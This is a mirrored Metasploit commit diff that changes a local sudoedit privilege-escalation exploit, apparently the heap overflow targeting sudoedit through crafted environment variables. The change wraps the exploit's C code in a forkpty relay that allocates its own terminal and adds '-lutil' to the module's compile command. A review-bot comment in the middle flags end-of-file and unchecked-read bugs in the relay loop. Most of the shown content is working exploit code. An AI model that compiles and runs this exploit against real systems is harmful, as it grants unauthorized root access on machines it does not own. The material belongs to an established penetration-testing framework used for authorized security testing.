mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-25 10:48:31 +02:00
Update the exploit C code to allocate it's own PTY
parent
13dd9ac10e
commit
b9413b4103
@ -23,6 +23,12 @@
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <ctype.h>
|
||||
#include <pty.h>
|
||||
#include <termios.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
#include <sys/select.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
// 512 environment variables should be enough for everyone
|
||||
#define MAX_ENVP 512
|
||||
@ -37,7 +43,7 @@ typedef struct {
|
||||
uint32_t lc_all_len;
|
||||
} target_t;
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
int exploit(int argc, char *argv[]) {
|
||||
|
||||
if (argc != 5) {
|
||||
return -1;
|
||||
@ -53,7 +59,7 @@ int main(int argc, char *argv[]) {
|
||||
target->lc_all_len = atoi(argv[4]);
|
||||
|
||||
printf(
|
||||
"using target: %s ['%s'] (%d, %d, %d, %d)\n",
|
||||
"using target: %s '%s' (%d, %d, %d, %d)\n",
|
||||
target->target_name,
|
||||
target->sudoedit_path,
|
||||
target->smash_len_a,
|
||||
@ -95,3 +101,58 @@ int main(int argc, char *argv[]) {
|
||||
execve(target->sudoedit_path, s_argv, s_envp);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
int master;
|
||||
pid_t pid;
|
||||
|
||||
pid = forkpty(&master, NULL, NULL, NULL);
|
||||
|
||||
if (pid < 0) {
|
||||
printf("Failed to fork\n");
|
||||
return -1;
|
||||
} else if (pid == 0) {
|
||||
if (ioctl(STDIN_FILENO, TIOCSCTTY, NULL) < 0) {
|
||||
printf("ioctl() TIOCSCTTY failed\n");
|
||||
}
|
||||
return exploit(argc, argv);
|
||||
}
|
||||
|
||||
struct termios tios;
|
||||
tcgetattr(master, &tios);
|
||||
tios.c_lflag &= ~(ECHO | ECHONL);
|
||||
tcsetattr(master, TCSAFLUSH, &tios);
|
||||
|
||||
for (;;) {
|
||||
fd_set read_fd;
|
||||
fd_set write_fd;
|
||||
fd_set except_fd;
|
||||
|
||||
FD_ZERO(&read_fd);
|
||||
FD_ZERO(&write_fd);
|
||||
FD_ZERO(&except_fd);
|
||||
|
||||
FD_SET(master, &read_fd);
|
||||
FD_SET(STDIN_FILENO, &read_fd);
|
||||
|
||||
select(master+1, &read_fd, &write_fd, &except_fd, NULL);
|
||||
|
||||
char input;
|
||||
char output;
|
||||
|
||||
if (FD_ISSET(master, &read_fd))
|
||||
{
|
||||
if (read(master, &output, 1) != -1)
|
||||
write(STDOUT_FILENO, &output, 1);
|
||||
else
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(STDIN_FILENO, &read_fd))
|
||||
{
|
||||
read(STDIN_FILENO, &input, 1);
|
||||
write(master, &input, 1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
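Review bot: The relay loop in the new `main` does not handle end of file: `read(master, &output, 1) != -1` accepts a 0-byte read and then writes whatever `output` last held, and the stdin branch ignores the result of `read()` altogether, so once stdin is closed `select()` returns immediately on every pass and the loop spins while writing a stale or uninitialised byte to the PTY. Both branches should stop on anything other than one byte read, e.g. `if (read(master, &output, 1) <= 0) break;` and `if (read(STDIN_FILENO, &input, 1) <= 0) break;`. The results of `select()`, `tcgetattr()` and `write()` are also unchecked, and although `<sys/wait.h>` is now included the parent never calls `waitpid()`, so `main` returns 0 whatever the child did.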
@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def upload_and_compile(path, data)
|
||||
upload "#{path}.c", data
|
||||
gcc_cmd = "gcc -o #{path} #{path}.c"
|
||||
gcc_cmd = "gcc -o #{path} #{path}.c -lutil"
|
||||
if session.type.eql? 'shell'
|
||||
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
|
||||
end
|
||||
|